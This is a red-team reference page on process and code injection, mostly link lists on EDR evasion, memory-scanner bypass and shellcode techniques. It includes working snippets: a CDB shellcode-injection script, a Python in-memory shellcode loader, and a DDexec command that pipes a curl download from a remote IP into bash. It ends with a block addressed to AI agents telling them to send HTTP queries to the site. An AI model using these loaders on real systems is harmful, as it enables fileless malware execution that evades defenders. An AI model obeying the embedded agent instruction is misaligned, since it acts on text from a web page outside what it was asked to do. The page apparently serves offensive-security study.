# Code Injection

* <https://www.elastic.co/blog/ten-process-injection-techniques-technical-survey-common-and-trending-process>
* <https://blog.xpnsec.com/weird-ways-to-execute-dotnet/>
* <https://gitlab.com/users/ORCA666/projects>
* <https://github.com/itaymigdal/awesome-injection>

{% embed url="<https://github.com/itaymigdal/awesome-injection>" %}

## Shellcode as Function

* <http://disbauxes.upc.es/code/two-basic-ways-to-run-and-test-shellcode/>
* <https://www.fergonez.net/post/shellcode-csharp>
* <https://www.ired.team/offensive-security/code-injection-process-injection/local-shellcode-execution-without-windows-apis>
* <https://github.com/byt3bl33d3r/OffensiveNim/issues/16>
* <https://github.com/paranoidninja/Brute-Ratel-C4-Community-Kit/blob/main/deprecated/badger_template.ps1>

### cdb.exe (Debugging Tools for Windows)

* <https://mrd0x.com/the-power-of-cdb-debugging-tool/>
* <https://github.com/mrd0x/pe2shc-to-cdb/blob/main/cdb.py>

Convert raw shellcode to a CDB script:

{% code title="cdb.py" %}

```python
import sys

with open(sys.argv[1], 'rb') as f:
	shellcode = f.read()

arr = [f';eb @$t0+{hex(i)[2:].zfill(2)} {hex(b)[2:].zfill(2).upper()}' for i, b in enumerate(shellcode)]

with open('out.wds', 'w') as f:
	f.write(f'.foreach /pS 5 (register {{.dvalloc {len(shellcode)}}}) {{r @$t0 = register}}\n')
	f.write('\n'.join([''.join(arr[i:i+16]) for i in range(0, len(arr), 16)]) + '\n')
	f.write('r @$ip=@$t0\n')
	f.write('g\n')
```

{% endcode %}

Run the shellcode in the debugged process:

```
Cmd > py .\cdb.py calc.bin
Cmd > cdb.exe -pd -cf .\out.wds -o notepad.exe
```

## Linux In-Memory Code Execution

* <https://blog.sektor7.net/#!res/2018/pure-in-memory-linux.md>
* <https://www.akamai.com/blog/security-research/the-definitive-guide-to-linux-process-injection>

### Memory Manipulation with Python

* <https://github.com/jonatanSh/shelf>
* <https://github.com/anvilsecure/ulexecve>

Convert an ELF to PIC, inject it and run from memory:

```
$ gcc hello.c -fno-stack-protector -fPIE -fpic -static --entry=main -o hello
$ python3 -m shelf --input hello
$ python3 run_sc.py
```

{% code title="run\_sc.py" %}

```python
# https://blog.sektor7.net/#!res/2018/pure-in-memory-linux.md#Python

from ctypes import (CDLL, c_void_p, c_size_t, c_int, c_long, memmove, CFUNCTYPE, cast, pythonapi)
from ctypes.util import find_library

PROT_READ = 0x01
PROT_WRITE = 0x02
PROT_EXEC = 0x04
MAP_PRIVATE = 0x02
MAP_ANONYMOUS = 0x20

with open('hellointel_x64.out.shell', 'rb') as f:
	sc = f.read()

libc = CDLL(find_library('c'))

mmap = libc.mmap
mmap.argtypes = [c_void_p, c_size_t, c_int, c_int, c_int, c_size_t]
mmap.restype = c_void_p
page_size = pythonapi.getpagesize()
sc_size = len(sc)

mem_size = page_size * (1 + sc_size / page_size)
cptr = mmap(0, int(mem_size), PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0)

memmove(cptr, sc, sc_size)
sc = CFUNCTYPE(c_void_p, c_void_p)
call_sc = cast(cptr, sc)
call_sc(None)
```

{% endcode %}

### DDexec

* <https://github.com/arget13/DDexec>

{% embed url="<https://youtu.be/MaBurwnrI4s>" %}

Run binaries from memory without touching the disk:

```
$1 base64 /bin/ls -w0 > ls.b64
$2 curl -sS 10.10.13.37/ls.b64 | bash <(curl -sSL https://github.com/arget13/DDexec/raw/main/ddexec.sh) /bin/NonExistentBinary -la
```

Another trick to do semi-fileless ELF execution with a pre-created process descriptor:

```
$ python3 -c 'import os;os.fork()or(os.setsid(),print(f"/proc/{os.getpid()}/fd/{os.memfd_create(str())}"),os.kill(os.getpid(),19))'
$ cat /usr/bin/date > /proc/1732982/fd/4
$ /proc/1732982/fd/4
```

### Tools

* <https://github.com/hackerschoice/bincrypter>

## Non-Standard GetModuleHandle/GetProcAddress

* <https://github.com/MzHmO/SymProcAddress>
* <https://github.com/Teach2Breach/moonwalk>
* <https://github.com/Teach2Breach/stargate>

## RtlRemoteCall

* <https://www.alex-ionescu.com/rtlremotecall/>
* <https://github.com/REDMED-X/OperatorsKit/blob/ff56550a1606e2a2cd9c6295ef42b5f8dc6ed156/KIT/LoadLib/loadlib.c>
* <https://sabotagesec.com/thread-hijacking-iceberg-deep-dive-into-phantom-call-rtlremotecall/>

## DLL Hollowing / Module Stomping

* <https://www.ired.team/offensive-security/code-injection-process-injection/modulestomping-dll-hollowing-shellcode-injection>
* [https://github.com/TheWover/donut/blob/61af8ccee3c2cafa743b2628654d1a2dafc66f3a/loader/inmem\_pe.c#L135](https://github.com/TheWover/donut/blob/61af8ccee3c2cafa743b2628654d1a2dafc66f3a/loader/inmem_pe.c)

### Variations of (Phantom) DLL Hollowing

* <https://www.forrest-orr.net/post/malicious-memory-artifacts-part-i-dll-hollowing>
* <https://www.forrest-orr.net/post/masking-malicious-memory-artifacts-part-ii-insights-from-moneta>
* <https://www.forrest-orr.net/post/masking-malicious-memory-artifacts-part-iii-bypassing-defensive-scanners>
* <https://github.com/forrest-orr/phantom-dll-hollower-poc>
* <https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/>
* <https://blog.f-secure.com/hiding-malicious-code-with-module-stomping-part-2/>
* <https://github.com/WithSecureLabs/ModuleStomping>
* <https://www.secforce.com/blog/dll-hollowing-a-deep-dive-into-a-stealthier-memory-allocation-variant/>
* <https://github.com/SECFORCE/DLL-Hollow-PoC>

### Advanced Module Stomping

* <https://labs.cognisys.group/posts/Advanced-Module-Stomping-and-Heap-Stack-Encryption/>
* <https://github.com/CognisysGroup/SweetDreams>
* <https://bruteratel.com/release/2023/03/19/Release-Nightmare/>

### Module Overloading

* <https://github.com/hasherezade/module_overloading>

#### Module Shifting

* <https://github.com/naksyn/ModuleShifting>
* <https://naksyn.com/edr%20evasion/2023/06/01/improving-the-stealthiness-of-memory-injections.html>

#### Process Stomping

* <https://github.com/hasherezade/process_overwriting>
* <https://www.naksyn.com/edr%20evasion/2023/11/18/mockingjay-revisited-process-stomping-srdi-beacon.html>
* <https://github.com/naksyn/ProcessStomping>

### Module Stomping in C\#

* <https://offensivedefence.co.uk/posts/module-stomping/>
* <https://github.com/rasta-mouse/TikiTorch/blob/master/TikiLoader/Stomper.cs>

## Function Stomping / Threadless Injection

* <https://idov31.github.io/2022/01/28/function-stomping.html>
* <https://github.com/Idov31/FunctionStomping>
* <https://klezvirus.github.io/RedTeaming/AV_Evasion/FromInjectionToHijacking/>

### ThreadlessInject

* <https://github.com/CCob/ThreadlessInject>
* <https://github.com/iilegacyyii/ThreadlessInject-BOF>
* <https://github.com/rkbennett/pyThreadlessInject>

{% embed url="<https://youtu.be/BYuAUYQcI-E>" %}

## Thread Pools (PoolParty)

* <https://www.safebreach.com/blog/process-injection-using-windows-thread-pools/>
* <https://github.com/SafeBreach-Labs/PoolParty>
* <https://github.com/0xEr3bus/PoolPartyBof>
* <https://urien.gitbook.io/diago-lima/a-deep-dive-into-exploiting-windows-thread-pools>

## VEH (Vectored Exception Handling)

* <https://www.ibm.com/think/x-force/using-veh-for-defense-evasion-process-injection>
* <https://github.com/passthehashbrowns/VectoredExceptionHandling>
* <https://bruteratel.com/research/2024/10/20/Exception-Junction/>
* <https://kr0tt.github.io/posts/early-exception-handling/>

## Early Cascade

* <https://www.outflank.nl/blog/2024/10/15/introducing-early-cascade-injection-from-windows-process-creation-to-stealthy-injection/>
* <https://github.com/Cracked5pider/earlycascade-injection>
* <https://github.com/0xNinjaCyclone/EarlyCascade>

## Thread Name-Calling Injection

* <https://research.checkpoint.com/2024/thread-name-calling-using-thread-name-for-offense/>
* <https://github.com/hasherezade/thread_namecalling>

## Waiting Thread Hijacking

* <https://research.checkpoint.com/2025/waiting-thread-hijacking/>
* <https://github.com/hasherezade/waiting_thread_hijacking>

## Control Flow Hijacking (Data Pointers)

* <https://www.legacyy.xyz/defenseevasion/windows/2025/04/16/control-flow-hijacking-via-data-pointers.html>
* <https://github.com/iilegacyyii/DataInject-BOF>

## Shellcode In-Memory Fluctuation (Obfuscate and Sleep)

{% embed url="<https://twitter.com/_RastaMouse/status/1443923456630968320>" %}

{% embed url="<https://youtu.be/edIMUcxCueA>" %}

* <https://www.solomonsklash.io/SleepyCrypt-shellcode-to-encrypt-a-running-image.html>
* <https://github.com/SolomonSklash/SleepyCrypt>
* <https://gist.github.com/S3cur3Th1sSh1t/6022dc2050bb1b21be2105b8b0dc077d>
* <https://github.com/mgeeky/ShellcodeFluctuation>
* <https://github.com/phra/PEzor/blob/master/fluctuate.cpp>
* <https://labs.f-secure.com/blog/bypassing-windows-defender-runtime-scanning/>
* <https://xz.aliyun.com/t/9399>
* <https://github.com/zu1k/beacon_hook_bypass_memscan>
* <https://suspicious.actor/2022/05/05/mdsec-nighthawk-study.html>
* <https://github.com/secidiot/FOLIAGE>
* <https://github.com/y11en/FOLIAGE>
* <https://github.com/ShellBind/G0T-B0R3D/blob/main/Cs-Sleep-Mask-Fiber.c>
* <https://github.com/Cracked5pider/Ekko/blob/main/Src/Ekko.c>
* <https://mez0.cc/posts/vulpes-obfuscating-memory-regions/>
* <https://github.com/janoglezcampos/DeathSleep>
* <https://blog.kyleavery.com/posts/avoiding-memory-scanners/>
* <https://github.com/kyleavery/AceLdr>
* <https://github.com/Idov31/Cronos>
* <https://github.com/lem0nSec/ShellGhost>

### gargoyle

* <https://github.com/JLospinoso/gargoyle>
* <https://lospi.net/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html>
* <https://labs.f-secure.com/blog/experimenting-bypassing-memory-scanners-with-cobalt-strike-and-gargoyle/>
* <https://www.arashparsa.com/bypassing-pesieve-and-moneta-the-easiest-way-i-could-find/>
* <https://github.com/waldo-irc/YouMayPasser>
* <https://github.com/thefLink/DeepSleep>

### Memory Scanners

* <https://github.com/forrest-orr/moneta>
* <https://github.com/hasherezade/pe-sieve>
* <https://github.com/waldo-irc/MalMemDetect>
* <https://github.com/thefLink/Hunt-Sleeping-Beacons>
* <https://github.com/paranoidninja/Cobaltstrike-Detection/blob/main/scan_process.c>
* <https://github.com/BlackSnufkin/LitterBox?tab=readme-ov-file>

```
PS > curl https://github.com/forrest-orr/moneta/releases/download/1.0/Moneta64.exe -o Moneta64.exe
PS > .\Moneta64.exe -p ((Get-Process notepad).Id) -m region --address 0xd34dc0d31000
```

## Return Address / Call Stack Spoofing

### Return Address Spoofing

* <https://www.unknowncheats.me/forum/anti-cheat-bypass/268039-x64-return-address-spoofing-source-explanation.html>
* <https://hulkops.gitbook.io/blog/red-team/x64-return-address-spoofing>
* <https://github.com/NtDallas/Svartalfheim/blob/main/src/RetAddr.c>

### ThreadStackSpoofer

* <https://github.com/mgeeky/ThreadStackSpoofer/tree/c2507248723d167fb2feddf50d35435a17fd61a2>
* <https://github.com/mgeeky/ThreadStackSpoofer>

An alternative way to get the nearest return address in current stack frame (besides [\_ReturnAddress](https://docs.microsoft.com/ru-ru/cpp/intrinsics/returnaddress?view=msvc-170) and [\_AddressOfReturnAddress](https://docs.microsoft.com/ru-ru/cpp/intrinsics/addressofreturnaddress?view=msvc-170)) without manually walking the stack:

{% code title="retaddr.cpp" %}

```cpp
#include <intrin.h>
#include <windows.h>
#include <iostream>
#include <sstream>
#include <iomanip>

// https://github.com/mgeeky/ThreadStackSpoofer/blob/f67caea38a7acdb526eae3aac7c451a08edef6a9/ThreadStackSpoofer/header.h#L38-L45
template<class... Args>
void log(Args... args)
{
    std::stringstream oss;
    (oss << ... << args);
    std::cout << oss.str() << std::endl;
}

// https://github.com/mgeeky/ThreadStackSpoofer/blob/f67caea38a7acdb526eae3aac7c451a08edef6a9/ThreadStackSpoofer/main.cpp#L13-L14
void addressOfReturnAddress() {
    auto pRetAddr = (PULONG_PTR)_AddressOfReturnAddress(); // https://doxygen.reactos.org/d6/d8c/intrin__ppc_8h_source.html#l00040
    log("Original return address via _AddressOfReturnAddress: 0x", std::hex, std::setw(8), std::setfill('0'), *pRetAddr);
}

// https://stackoverflow.com/a/1334586/6253579
void rtlCaptureStackBackTrace() {
    typedef USHORT(WINAPI* CaptureStackBackTraceType)(__in ULONG, __in ULONG, __out PVOID*, __out_opt PULONG);
    CaptureStackBackTraceType RtlCaptureStackBackTrace = (CaptureStackBackTraceType)(GetProcAddress(LoadLibrary("ntdll.dll"), "RtlCaptureStackBackTrace"));

    void* callers[2] = { NULL };
    int count = (RtlCaptureStackBackTrace)(1, 2, callers, NULL);
    log("Original return address via RtlCaptureStackBackTrace: 0x", std::hex, std::setw(8), std::setfill('0'), (DWORD64)callers[0]);
}

int main(int argc, char** argv)
{
    addressOfReturnAddress();
    rtlCaptureStackBackTrace();
    return 0;
}
```

{% endcode %}

### Call Stack Spoofing

{% embed url="<https://youtu.be/7EheXiC3MJE>" %}

* <https://www.elastic.co/security-labs/peeling-back-the-curtain-with-call-stacks>
* <https://dtsec.us/2023-09-15-StackSpoofin/>
* <https://hulkops.gitbook.io/blog/red-team/x64-call-stack-spoofing>

#### VulcanRaven

* <https://labs.withsecure.com/blog/spoofing-call-stacks-to-confuse-edrs/>
* <https://github.com/WithSecureLabs/CallStackSpoofer>

#### SilentMoonwalk

* <https://klezvirus.github.io/RedTeaming/AV_Evasion/StackSpoofing/>
* <https://github.com/klezVirus/SilentMoonwalk>

#### LoudSunRun

* <https://github.com/susMdT/LoudSunRun>

#### DreamWalkers

* <https://maxdcb.github.io/DreamWalkers/>
* <https://github.com/maxDcb/DreamWalkers>

### Proxy DLL Loading / Legit API Proxying

* <https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/>
* <https://0xdarkvortex.dev/hiding-in-plainsight/>
* <https://github.com/paranoidninja/Proxy-DLL-Loads>
* <https://github.com/paranoidninja/Proxy-Function-Calls-For-ETwTI>
* <https://github.com/kleiton0x00/Proxy-DLL-Loads>
* <https://fin3ss3g0d.net/index.php/2024/03/18/weaponizing-windows-thread-pool-apis-proxying-dll-loads/>
* <https://blog.cryptoplague.net/main/research/windows-research/proxyalloc-evading-ntallocatevirtualmemory-detection-ft.-elastic-defend-and-binary-ninja>
* <https://offsec.almond.consulting/evading-elastic-callstack-signatures.html>

## Hook NtCreateSection

* <https://waawaa.github.io/es/amsi_bypass-hooking-NtCreateSection/>
* <https://github.com/waawaa/Hooked-Injector>
* <https://s3cur3th1ssh1t.github.io/Cat_Mouse_or_Chess/>
* <https://github.com/S3cur3Th1sSh1t/Ruy-Lopez>

## Avoid PsSetCreateThreadNotifyRoutine

* <https://www.r-tec.net/r-tec-blog-process-injection-avoiding-kernel-triggered-memory-scans.html>
* <https://github.com/S3cur3Th1sSh1t/Caro-Kann>
* <https://caueb.com/attackdefense/threadlessstompingkann/>
* <https://github.com/caueb/ThreadlessStompingKann>

## ntdll!Ldrp\* Shenanigans

* <https://github.com/cybersectroll/TrollBlacklistDLL>
* <https://github.com/RWXstoned/LdrShuffle>

## EDR Preloading

* <https://malwaretech.com/2024/02/bypassing-edrs-with-edr-preload.html>
* <https://github.com/MalwareTech/EDR-Preloader>

## Shellcode Encryption

### SystemFunction032 / SystemFunction033

* <https://s3cur3th1ssh1t.github.io/SystemFunction032_Shellcode/>
* <https://gist.github.com/snovvcrash/3533d950be2d96cf52131e8393794d99>
* <https://www.redteam.cafe/red-team/shellcode-injection/inmemory-shellcode-encryption-and-decryption-using-systemfunction033>

### SystemFunction040 / SystemFunction041

* <https://github.com/Cracked5pider/CodeCave/tree/main/EkkoSys040>

## Shellcode Execution via Callbacks

* <https://github.com/aahmad097/AlternativeShellcodeExec>
* <https://github.com/werdhaihai/SharpAltShellCodeExec>
* <https://github.com/ScriptIdiot/shellcode_execute_rare_WinAPI>
* <https://marcoramilli.com/2022/06/15/running-shellcode-through-windows-callbacks/>
* <https://osandamalith.com/2021/04/01/executing-shellcode-via-callbacks/>
* <http://ropgadget.com/posts/abusing_win_functions.html>

## PE to Shellcode

* [\[PDF\] From a C project, through assembly, to shellcode (hasherezade for @vxunderground)](https://github.com/vxunderground/VXUG-Papers/blob/main/From%20a%20C%20project%20through%20assembly%20to%20shellcode.pdf)
* <https://github.com/hasherezade/pe_to_shellcode>
* <https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/>
* <https://github.com/paranoidninja/PIC-Get-Privileges>
* <https://github.com/s0i37/av_bypass/blob/master/crypt/cryptor.py>
* <https://github.com/4l3x777/shell_maker>
* <https://github.com/maxDcb/DreamWalkers>
* <https://g3tsyst3m.com/fileless%20techniques/Bypassing-EDR-using-an-In-Memory-PE-Loader/>

### sRDI

* <https://github.com/monoxgas/sRDI>
* <https://blog.malicious.group/writing-your-own-rdi-srdi-loader-using-c-and-asm/>

### Donut

* <https://thewover.github.io/Introducing-Donut/>
* <https://thewover.github.io/Cruller/>
* <https://github.com/TheWover/donut>
* <https://github.com/S4ntiagoP/donut/tree/syscalls>
* <https://github.com/Binject/go-donut>
* <https://github.com/listinvest/undonut>

### Python

{% content-ref url="/pages/-MfILYEZdPFsqTo3BIyP#pyramid" %}
[AV / EDR Evasion](/pentest/infrastructure/ad/av-edr-evasion.md#pyramid)
{% endcontent-ref %}

* <https://www.naksyn.com/edr%20evasion/2023/06/01/improving-the-stealthiness-of-memory-injections.html>
* <https://github.com/naksyn/PythonMemoryModule>
* <https://github.com/naksyn/ModuleShifting>

### InflativeLoading

* <https://winslow1984.com/books/malware/page/reflectiveloading-and-inflativeloading>
* <https://github.com/senzee1984/InflativeLoading>

### Crystal Palace

* <https://tradecraftgarden.org/docs.html>
* <https://rastamouse.me/crystal-malware/>
* <https://rastamouse.me/modular-pic-c2-agents/>
* <https://github.com/rasta-mouse/Crystal-Loaders>

## PE Injection

* <https://gist.github.com/hasherezade/e6daa4124fab73543497b6d1295ece10>
* <https://xakep.ru/2018/08/27/doppelganging-process/>
* <https://xakep.ru/2022/04/21/herpaderping-and-ghosting/>

## Backdoor Legit PE

### SuperMega

* <https://blog.deeb.ch/posts/supermega/>
* <https://blog.deeb.ch/posts/how-edr_works/>
* <https://blog.deeb.ch/posts/exe-injection/>
* <https://github.com/dobin/SuperMega>

## Detection

* <https://www.mono-project.com/docs/tools+libraries/tools/monodis/>
* <https://github.com/Dump-GUY/Get-PDInvokeImports>

Show P/Invoke imports in a .NET assembly with `System.Reflection.Metadata` and PowerShell Core (stolen from [1](https://stackoverflow.com/q/71456804/6253579), [2](https://stackoverflow.com/a/54775040/6253579)):

```powershell
$assembly = "\path\to\csharp\binary.exe"
$stream = [System.IO.File]::OpenRead($assembly)
$peReader = [System.Reflection.PortableExecutable.PEReader]::new($stream, [System.Reflection.PortableExecutable.PEStreamOptions]::LeaveOpen -bor [System.Reflection.PortableExecutable.PEStreamOptions]::PrefetchMetadata)
$metadataReader = [System.Reflection.Metadata.PEReaderExtensions]::GetMetadataReader($peReader)
$assemblyDefinition = $metadataReader.GetAssemblyDefinition()

foreach($typeHandler in $metadataReader.TypeDefinitions) {
    $typeDef = $metadataReader.GetTypeDefinition($typeHandler)
    foreach($methodHandler in $typeDef.GetMethods()) {
        $methodDef = $metadataReader.GetMethodDefinition($methodHandler)

        $import = $methodDef.GetImport()
        if ($import.Module.IsNil) {
            continue
        }

        $dllImportFuncName = $metadataReader.GetString($import.Name)
        $dllImportParameters = $import.Attributes.ToString()
        $dllImportPath = $metadataReader.GetString($metadataReader.GetModuleReference($import.Module).Name)
        Write-Host "$dllImportPath, $dllImportParameters`n$dllImportFuncName`n"
    }
}
```

Another [method](https://twitter.com/vinopaljiri/status/1508447487048261641) with a PowerShell one-liner:

```powershell
([System.Reflection.Assembly]::LoadFile("\path\to\csharp\binary.exe")).GetTypes() | % {$_.GetMethods([Reflection.BindingFlags]::Public -bxor [Reflection.BindingFlags]::NonPublic -bxor [Reflection.BindingFlags]::Static) | ? {$_.Attributes -band [Reflection.MethodAttributes]::PinvokeImpl}} | fl -Property Name,DeclaringType,CustomAttributes
```

## Tools

* <https://github.com/0xDivyanshu/Injector>
* <https://github.com/jfmaes/SharpZipRunner>
* <https://github.com/plackyhacker/Shellcode-Injection-Techniques>
* <https://github.com/3xpl01tc0d3r/ProcessInjection>
* <https://github.com/Wra7h/SingleDose>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ppn.snovvcra.sh/red-team/dev/code-injection.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.